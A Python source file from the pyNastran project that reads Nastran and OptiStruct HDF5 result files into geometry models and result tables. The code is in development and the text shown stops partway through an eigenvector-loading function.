a046b0c8e0867f4f44ebfafedd5e973dffe0e6ad
| 64,172
|
py
|
Python
|
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
https://public.kitware.com/pipermail/paraview/2016-January/035894.html
https://discourse.paraview.org/t/paraviewweb-visualizer/1268/5
https://discourse.vtk.org/t/appending-data-field-to-a-vtk-file-python-vtk/3220/3
https://www.paraview.org/Wiki/Python_Programmable_Filter
https://stackoverflow.com/questions/54603267/how-to-show-vtkunstructuredgrid-in-python-script-based-on-paraview/54633793#54633793
https://vtkpythonpackage.readthedocs.io/en/latest/index.html
https://cvw.cac.cornell.edu/ParaViewAdv/pythonshell
"""
from itertools import count
from pprint import pprint
from typing import Dict, List, Optional, Any, TYPE_CHECKING
import os
import sys
import vtk # vtk > 9
#import vtkmodules
#vtkmodules.vtkCommonCore.
import h5py
import numpy as np
import pandas as pd
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from pyNastran.utils import print_bad_path, object_attributes, object_methods, object_stats
from pyNastran.bdf.bdf import BDF
from pyNastran.op2.op2 import OP2
from pyNastran.dev.h5.h5_utils import get_tree, h5py_to_dataframe
from pyNastran.dev.h5.h5_case_control import load_case_control, load_parameters
from pyNastran.dev.h5.h5_elements import element_map
from pyNastran.dev.h5.h5_constraints import constraint_map
from pyNastran.dev.h5.h5_loads import load_map
from pyNastran.dev.h5.h5_tables import table_map
from pyNastran.dev.h5.h5_geometry import (
coord_map, node_map,
material_map,
matrix_map, design_map, dynamic_map, partition_map,
load_geometry_block)
from pyNastran.dev.h5.h5_properties import property_map
from pyNastran.dev.h5.h5_result_objects import RealVectorTable, RealVectorTableOptistruct, RealStrainEnergyOptistruct
#from pyNastran.gui.utils.vtk.base_utils import numpy_to_vtk
Function = Any
from cpylog import SimpleLogger
if TYPE_CHECKING:
from pyNastran.op2.op2 import OP2
class BDF2:
def __init__(self):
self.log = SimpleLogger(level='debug', encoding='utf-8', log_func=None)
self.card_count = {}
self.CTRIA3 = None
self.CQUAD4 = None
self.CTRIA6 = None
self.CQUAD8 = None
self.CTETRA = None
self.CPENTA = None
self.CPYRAM = None
self.CHEXA = None
def break_domain_by_case(domains_df: pd.DataFrame, INDEX_DOMAIN) -> pd.DataFrame:
#subcase = domains_df['SUBCASE']
#analysis_code = domains_df['ANALYSIS']
#eigr = mycase['TIME_FREQ_EIGR']
#eigi = mycase['EIGI']
#mode = mycase['MODE']
subcase = domains_df['SUBCASE']
isubcase = subcase != 0
keys = ['SUBCASE','ANALYSIS', 'STEP', 'DESIGN_CYCLE', 'RANDOM', 'SE', 'AFPM', 'TRMC', 'INSTANCE', 'MODULE']
domain_no_zero = domains_df.loc[isubcase]
grouped = domain_no_zero.groupby(keys)
#for g in grouped:
#print(g)
grouped_df = grouped.size().reset_index().rename(columns={0:'count'})[keys]
#step = mycase['STEP']
#design_cycle = mycase['DESIGN_CYCLE']
#random = mycase['RANDOM']
#se = mycase['SE']
#afpm = mycase['AFPM']
#trmc = mycase['TRMC']
#inst = mycase['INSTANCE']
#module = mycase['MODULE']
return grouped # _df
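# Sketch of how the grouping above is consumed (values shown are illustrative):
# iterating the GroupBy yields one (SUBCASE, ANALYSIS, STEP, ...) key tuple,
# following the `keys` list, plus the block of DOMAINS rows for that case.
#
#     for (subcase, analysis, *rest), dfi in break_domain_by_case(domains_df, None):
#         print(subcase, analysis, len(dfi))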
class pyNastranH5:
def __init__(self,
add_aero: bool=True,
add_constraints: bool=True,
add_results: bool=True,
subcases=None):
self.filename = None
self.geom_model = None
self.add_aero = add_aero
self.add_constraints = add_constraints
self.add_results = add_results
self.flags = {
'aero': add_aero,
'constraint': add_constraints,
'results': add_results,
'subcases': subcases,
}
self.subcases = subcases
self.log = SimpleLogger(level='debug', encoding='utf-8', log_func=None)
def read_h5_nastran(self, h5_filename: str,
subcases: Optional[List[int]]=None) -> None:
self.filename = h5_filename
print(f'opening {h5_filename}')
assert os.path.exists(h5_filename), print_bad_path(h5_filename)
hdf5_file = h5py.File(h5_filename, 'r')
# ['INDEX', 'NASTRAN']
"""
{'INDEX': {
'NASTRAN': {
'RESULT': {
'ELEMENTAL': {
'STRESS': {'QUAD4': None}},
'NODAL': {
'EIGENVECTOR': None}}}},
'NASTRAN': {
'INPUT': {
'DOMAINS': None,
'DYNAMIC': {'EIGRL': {'IDENTITY': None}},
'ELEMENT': {'CQUAD4': None},
'MATERIAL': {'MAT1': None},
'NODE': {'GRID': None},
'PARAMETER': {'CASECC': {'SUBCASE': None},
'MDLPRM': None,
'PVT': {'INT': None}},
'PROPERTY': {'PSHELL': None}
},
'RESULT': {
'DOMAINS': None,
'ELEMENTAL': {'STRESS': {'QUAD4': None}},
'NODAL': {'EIGENVECTOR': None},
'SUMMARY': {'EIGENVALUE': None}}}}
"""
tree = get_tree(hdf5_file)
#pprint(tree)
self._load_geometry(hdf5_file)
#return
self._load_results(hdf5_file, subcases=subcases)
def _load_geometry(self, hdf5_file: h5py.File) -> None:
base_str = 'NASTRAN/INPUT'
inputs = hdf5_file.get(base_str)
#['CONSTRAINT', 'COORDINATE_SYSTEM', 'DESIGN', 'DOMAINS', 'ELEMENT', 'LOAD', 'MATERIAL', 'NODE', 'PARAMETER', 'PROPERTY', 'TABLE']
quiet_skip_inputs = ['DOMAINS', 'PARAMETER']
geom_model = BDF()
geom_model.flags = self.flags
log = geom_model.log
for geom_name in list(inputs):
if geom_name in quiet_skip_inputs:
continue
geom_group = inputs.get(geom_name)
if geom_name == 'CONSTRAINT':
#if not self.add_constraints:
#continue
load_geometry_block(geom_group, constraint_map, geom_model)
elif geom_name == 'COORDINATE_SYSTEM':
load_geometry_block(geom_group, coord_map, geom_model)
elif geom_name == 'DESIGN':
load_geometry_block(geom_group, design_map, geom_model)
#elif geom_name == 'DOMAINS':
elif geom_name == 'DYNAMIC':
load_geometry_block(geom_group, dynamic_map, geom_model)
elif geom_name == 'ELEMENT':
load_geometry_block(geom_group, element_map, geom_model)
elif geom_name == 'LOAD':
load_geometry_block(geom_group, load_map, geom_model)
elif geom_name == 'MATERIAL':
#if not self.add_material:
#continue
load_geometry_block(geom_group, material_map, geom_model)
elif geom_name == 'MATRIX':
load_geometry_block(geom_group, matrix_map, geom_model)
elif geom_name == 'NODE':
load_geometry_block(geom_group, node_map, geom_model)
elif geom_name == 'PARTITION':
load_geometry_block(geom_group, partition_map, geom_model)
elif geom_name == 'PROPERTY':
load_geometry_block(geom_group, property_map, geom_model)
elif geom_name == 'TABLE':
load_geometry_block(geom_group, table_map, geom_model)
else:
log.warning(f'skipping {geom_name}')
load_parameters(hdf5_file, geom_model)
cc_str = 'NASTRAN/INPUT/PARAMETER/CASECC/SUBCASE'
cc = hdf5_file.get(cc_str)
assert cc is not None, cc
load_case_control(geom_model, cc)
#geom_model.write_bdf(r'C:\NASA\m4\formats\git\pyNastran\models\msc\spike.bdf')
finish_geometry(geom_model)
self.geom_model = geom_model
def _load_results(self, hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> None:
geom_model = self.geom_model
node_ids = geom_model._node_ids
element_ids = geom_model._element_ids
domains_str = '/NASTRAN/RESULT/DOMAINS'
domains = hdf5_file.get(domains_str)
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
domains_df = h5py_to_dataframe(domains)
assert domains is not None, domains
assert domains_df is not None, domains_df
result_str = '/NASTRAN/RESULT'
result_index_str = '/INDEX/NASTRAN/RESULT'
#stress = hdf5_file.get('/INDEX/NASTRAN/RESULT/ELEMENTAL/STRESS')
#pprint(stress)
#pprint(get_tree(stress))
results_dict = {}
iresult = 0
model = OP2()
log = model.log
results = hdf5_file.get(result_str)
for res_name in results:
#results_group = hdf5_file.get(name)
if res_name in ['NODAL', 'ELEMENTAL',
'AERODYNAMIC', 'DOMAINS', 'MATRIX', 'MONITOR', 'OPTIMIZATION', 'SUMMARY']:
pass
else:
log.warning(f'skipping result {res_name}')
#iresult = self._load_nodal_results(
#iresult, results_dict,
#geom_model, model, node_ids,
#domains_df, hdf5_file, subcases=subcases)
#return
# --------------------------------------------------------------
iresult = self._load_elemental_results(
iresult,
result_str, result_index_str,
results_dict,
geom_model, model, element_ids,
domains_df, hdf5_file, subcases=subcases)
self.results = results_dict
#geom_model.write_bdf(r'C:\NASA\m4\formats\git\pyNastran\models\msc\6+element-nastran-sol103.bdf')
#self.results = results # type: Dict[int, RealVectorTableOptistruct]
#self.results_model = model
def _load_elemental_results(self, iresult: int,
result_str: str, result_index_str: str,
results: Dict[int, Any],
geom_model: BDF,
model: OP2,
element_ids: np.ndarray,
domains_df: pd.DataFrame,
hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> int:
elemental_str = result_str + '/ELEMENTAL'
elemental_index_str = result_index_str + '/ELEMENTAL'
assert domains_df is not None
element = hdf5_file.get(elemental_str)
element_index = hdf5_file.get(elemental_index_str)
#pprint(get_tree(element))
#pprint(get_tree(element_index))
basename = ''
for ires, name in enumerate(element):
group = element.get(name)
index = element_index.get(name)
if name == 'ENERGY':
iresult = load_strain_energy(basename, iresult, results,
domains_df, group, index,
element_ids,
geom_model, model,
subcases=subcases)
elif name in ['STRESS', 'STRAIN']:
is_stress = name == 'STRESS'
iresult = load_stress_strain(basename, iresult, results,
domains_df, group, index,
element_ids,
geom_model, model,
is_stress=is_stress,
subcases=subcases)
elif name in ['ELEMENT_FORCE', 'FAILURE_INDEX']:
pass
#load_eigenvector(results, i, domains_df, group, index, model)
else:
raise NotImplementedError(name)
#element = hdf5_file.get(element_str)
#pprint(get_tree(element))
        #load_geometry_block(element, element_map, geom_model)
        return iresult
def _load_nodal_results(self, iresult: int,
results: Dict[int, Any],
geom_model: BDF,
model: OP2,
node_ids: np.ndarray,
domains_df: pd.DataFrame,
hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> int:
assert domains_df is not None
nodal_str = '/NASTRAN/RESULT/NODAL'
nodal_index_str = '/INDEX/NASTRAN/RESULT/NODAL'
name_map = {
'EIGENVECTOR': 'Eigenvector',
'EIGENVECTOR_CPLX': 'Eigenvector',
'DISPLACEMENT': 'Displacement',
'DISPLACEMENT_CPLX': 'Displacement',
'VELOCITY': 'Velocity',
'APPLIED_LOAD': 'Applied Load',
'APPLIED_LOAD_CPLX': 'Applied Load',
'SPC_FORCE': 'SPC Force',
'SPC_FORCE_CPLX': 'SPC Force',
'MPC_FORCE': 'MPC Force',
'MPC_FORCE_CPLX': 'MPC Force',
'GRID_FORCE': 'Grid Point Force',
'KINETIC_ENERGY': 'Kinetic Energy',
'GRID_WEIGHT': 'Grid Point Weight',
'TEMPERATURE': 'Temperature',
#'KINETIC_ENERGY': 'Eigenvector',
}
node = hdf5_file.get(nodal_str)
node_index = hdf5_file.get(nodal_index_str)
#pprint(get_tree(node))
#pprint(get_tree(node_index))
for ires, name in enumerate(node):
group = node.get(name)
index = node_index.get(name)
basename = name_map[name]
if name == 'EIGENVECTOR':
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['EIGENVECTOR_CPLX', 'APPLIED_LOAD_CPLX', 'DISPLACEMENT_CPLX', 'SPC_FORCE_CPLX', 'MPC_FORCE_CPLX']:
iresult = load_eigenvector_complex(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['DISPLACEMENT', 'VELOCITY']:
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['SPC_FORCE', 'MPC_FORCE', 'APPLIED_LOAD']:
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['GRID_FORCE', 'KINETIC_ENERGY', 'GRID_WEIGHT', 'TEMPERATURE']:
# GRID_POINT_FORCE
pass
else:
raise NotImplementedError(name)
#load_geometry_block(node, node_map, model)
return iresult
def finish_geometry(geom_model: BDF):
from pyNastran.dev.h5.fill_unstructured_grid import _load_nodes
nodes, node_ids, nid_map, idtype = _load_nodes(geom_model)
geom_model._nodes = nodes
geom_model._node_ids = node_ids
geom_model._element_ids = None
geom_model._nid_map = nid_map
geom_model._idtype = idtype
def load_strain_energy(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
element_group: h5py._hl.group.Group,
element_index: h5py._hl.group.Group,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
basename = 'Strain Energy'
#assert ids is not None
for ires, element_group_name in enumerate(element_group):
group = element_group.get(element_group_name)
index = element_index.get(element_group_name)
if element_group_name == 'IDENT':
#group = <class 'h5py._hl.dataset.Dataset'>
#('IDENT', 'ELNAME', 'ETOTAL', 'CVALRES', 'ESUBT', 'ETOTPOS', 'ETOTNEG')
#IDENT = array([ 1, 2, 3, 4, 5])
#ELNAME = array([b'BAR ', b'HEXA ', b'PENTA '])
pass
elif element_group_name == 'STRAIN_ELEM':
#group = <class 'h5py._hl.dataset.Dataset'>
#('ID', 'ENERGY', 'PCT', 'DEN', 'IDENT', 'DOMAIN_ID')
#index = <class 'h5py._hl.dataset.Dataset'>
#('DOMAIN_ID', 'POSITION', 'LENGTH')
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
EID_BASE = group['ID']
ieid = ~(EID_BASE == 100000000)
EID = EID_BASE[ieid]
ENERGY = group['ENERGY', ieid]
PCT = group['PCT', ieid]
DEN = group['DEN', ieid]
IDENT = group['IDENT', ieid]
DOMAIN = group['DOMAIN_ID', ieid]
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
subcases = geom_model.subcases
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
# dfi
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 1 0 2 -2.572570e-07 0.0 1 0 0 0 0 0 0 0
# 1 2 1 0 2 8.711537e-07 0.0 2 0 0 0 0 0 0 0
# 2 3 1 0 2 2.950070e-06 0.0 3 0 0 0 0 0 0 0
# 3 4 1 0 2 3.668822e-06 0.0 4 0 0 0 0 0 0 0
# 4 5 1 0 2 4.037721e-06 0.0 5 0 0 0 0 0 0 0
# 5 6 1 0 2 5.389803e-06 0.0 6 0 0 0 0 0 0 0
# 6 7 1 0 2 9.181562e+03 0.0 7 0 0 0 0 0 0 0
# 7 8 1 0 2 2.184327e+04 0.0 8 0 0 0 0 0 0 0
# 8 9 1 0 2 2.399637e+04 0.0 9 0 0 0 0 0 0 0
# 9 10 1 0 2 2.903699e+04 0.0 10 0 0 0 0 0 0 0
# 10 11 1 0 2 3.472390e+04 0.0 11 0 0 0 0 0 0 0
# 11 12 1 0 2 4.077224e+04 0.0 12 0 0 0 0 0 0 0
# 12 13 1 0 2 6.833794e+04 0.0 13 0 0 0 0 0 0 0
# 13 14 1 0 2 8.648623e+04 0.0 14 0 0 0 0 0 0 0
# 14 15 1 0 2 9.260647e+04 0.0 15 0 0 0 0 0 0 0
# 15 16 1 0 2 6.013470e-154 0.0 1 0 0 0 0 0 0 0
# 16 17 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 17 18 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 18 19 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 19 20 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 20 21 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 21 22 1 0 2 6.013470e-154 0.0 2 0 0 0 0 0 0 0
# 22 23 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 23 24 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 24 25 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 25 26 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 26 27 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 27 28 1 0 2 6.013470e-154 0.0 3 0 0 0 0 0 0 0
# 28 29 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 29 30 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 30 31 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 31 32 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 32 33 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 33 34 1 0 2 6.013470e-154 0.0 4 0 0 0 0 0 0 0
# 34 35 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 35 36 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 36 37 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 37 38 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 38 39 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 39 40 1 0 2 6.013470e-154 0.0 5 0 0 0 0 0 0 0
# 40 41 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 41 42 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 42 43 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 43 44 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 44 45 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 45 46 1 0 2 6.013470e-154 0.0 6 0 0 0 0 0 0 0
# 46 47 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 47 48 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 48 49 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 49 50 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 50 51 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 51 52 1 0 2 6.013470e-154 0.0 7 0 0 0 0 0 0 0
# 52 53 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 53 54 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 54 55 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 55 56 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 56 57 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 57 58 1 0 2 6.013470e-154 0.0 8 0 0 0 0 0 0 0
# 58 59 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 59 60 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 60 61 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 61 62 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 62 63 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 63 64 1 0 2 6.013470e-154 0.0 9 0 0 0 0 0 0 0
# 64 65 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 65 66 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 66 67 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 67 68 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 68 69 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 69 70 1 0 2 6.013470e-154 0.0 10 0 0 0 0 0 0 0
# 70 71 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 71 72 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 72 73 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 73 74 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 74 75 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 75 76 1 0 2 6.013470e-154 0.0 11 0 0 0 0 0 0 0
# 76 77 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 77 78 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 78 79 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 79 80 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 80 81 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 81 82 1 0 2 6.013470e-154 0.0 12 0 0 0 0 0 0 0
# 82 83 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 83 84 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 84 85 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 85 86 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 86 87 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 87 88 1 0 2 6.013470e-154 0.0 13 0 0 0 0 0 0 0
# 88 89 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 89 90 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 90 91 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 91 92 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 92 93 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 93 94 1 0 2 6.013470e-154 0.0 14 0 0 0 0 0 0 0
# 94 95 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 95 96 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 96 97 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 97 98 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 98 99 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 99 100 1 0 2 6.013470e-154 0.0 15 0 0 0 0 0 0 0
# 100 101 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 101 102 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 102 103 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 103 104 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 104 105 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if not np.any(exists):
continue
idomain = idomain[exists]
print('partial domain...')
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE'][idomain] # .values[0]
analysis_code = dfi['ANALYSIS'][idomain]
eigr = dfi['TIME_FREQ_EIGR'][idomain]# .values[0]
eigi = dfi['EIGI'][idomain]
mode = dfi['MODE'][idomain]# .values[0]
#SEID Integer, default=0 Super element id of the data block
#AFPMID Integer, default=0 Acoustic field point mesh id
#TRIMID Trim id, default=0 Trim component id
step = dfi['STEP'][idomain].values[0]
design_cycle = dfi['DESIGN_CYCLE'][idomain].values[0]
random = dfi['RANDOM'][idomain].values[0]
se = dfi['SE'][idomain].values[0]
afpm = dfi['AFPM'][idomain].values[0]
trmc = dfi['TRMC'][idomain].values[0]
inst = dfi['INSTANCE'][idomain].values[0]
module = dfi['MODULE'][idomain].values[0]
assert step in [0, 1], step
#assert design_cycle == 0, design_cycle
assert random == 0, random
assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
is_modes = mode.max() != 0
#step_type = ''
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
name = _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq)
if subcasei in subcases:
#print('found subcase')
pass
i0 = positioni
i1 = positioni + lengthi
iresults[itime] = iresult
_domain = DOMAIN[i0]
eid = EID[i0:i1]
energy = ENERGY[i0:i1]
percent = PCT[i0:i1]
density = DEN[i0:i1]
ident = IDENT[i0:i1] # TODO: what is this????
print(name, 'ident', list(np.unique(ident)))
results[iresult] = RealStrainEnergyOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
eid,
energy, percent, density,
_domain, location='element')
iresult += 1
#if name in ['BAR', 'QUAD4_COMP', 'TRIA3_COMP']:
#pass
else:
            raise NotImplementedError(element_group_name)
    return iresult
def load_stress_strain(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
element_group: h5py._hl.group.Group,
element_index: h5py._hl.group.Group,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
is_stress: bool=True,
subcases: Optional[List[int]]=None) -> int:
for ires, name in enumerate(element_group):
group = element_group.get(name)
index = element_index.get(name)
if name in ['BAR', 'QUAD4_COMP', 'TRIA3_COMP']:
pass
else:
raise NotImplementedError(name)
    # TODO: stress/strain recovery is not implemented yet
    raise NotImplementedError('stress/strain result loading is not implemented yet')
def load_eigenvector(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
group: h5py._hl.dataset.Dataset,
index: h5py._hl.dataset.Dataset,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
"""
<HDF5 dataset "EIGENVECTOR": shape (147,), type "|V64">
Dataset:
attrs : <Attributes of HDF5 object at 2156696909096>
chunks : (510,)
compression : 'gzip'
compression_opts : 1
dims : <Dimensions of HDF5 object at 2156696909096>
dtype : dtype([('ID', '<i8'), ('X', '<f8'), ('Y', '<f8'), ('Z', '<f8'), ('RX', '<f8'), ('RY', '<f8'), ('RZ', '<f8'), ('DOMAIN_ID', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0., 0., 0., 0., 0., 0., 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x000001F625273528>
is_virtual : False
maxshape : (None,)
name : '/NASTRAN/RESULT/NODAL/EIGENVECTOR'
nbytes : 9408
ndim : 1
parent : <HDF5 group "/NASTRAN/RESULT/NODAL" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x000001F625247DC8>
scaleoffset : None
shape : (147,)
shuffle : True
size : 147
-------------------------------------------------
Dataset:
attrs : <Attributes of HDF5 object at 1418106158632>
chunks : None
compression : None
compression_opts : None
dims : <Dimensions of HDF5 object at 1418106158632>
dtype : dtype([('DOMAIN_ID', '<i8'), ('POSITION', '<i8'), ('LENGTH', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0, 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x0000014A2DB6BE28>
is_virtual : False
maxshape : (3,)
name : '/INDEX/NASTRAN/RESULT/NODAL/EIGENVECTOR'
nbytes : 72
ndim : 1
parent : <HDF5 group "/INDEX/NASTRAN/RESULT/NODAL" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x0000014A2DBB1108>
scaleoffset : None
shape : (3,)
shuffle : False
size : 3
"""
basename_orig += ' (real)'
# TODO: check real/imaginary or magnitude/phase
#'ID', 'X', 'Y', 'Z', 'RX', 'RY', 'RZ', 'DOMAIN_ID',
#'DOMAIN_ID', 'POSITION', 'LENGTH'
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
NID = group['ID']
names = group.dtype.names
if 'X' in names:
TX = group['X']
TY = group['Y']
TZ = group['Z']
RX = group['RX']
RY = group['RY']
RZ = group['RZ']
solver = 'msc'
elif 'VALUE' in names:
VALUE = group['VALUE']
#(20214885, 6)
solver = 'optistruct'
else:
raise RuntimeError(str(names))
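    # Note: MSC tables expose six scalar columns (X, Y, Z, RX, RY, RZ) per row,
    # while the OptiStruct flavour packs the same six components into a single
    # 'VALUE' array of shape (nrows, 6); both paths feed the same result objects
    # further down.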
DOMAIN = group['DOMAIN_ID']
# what are the subcases...
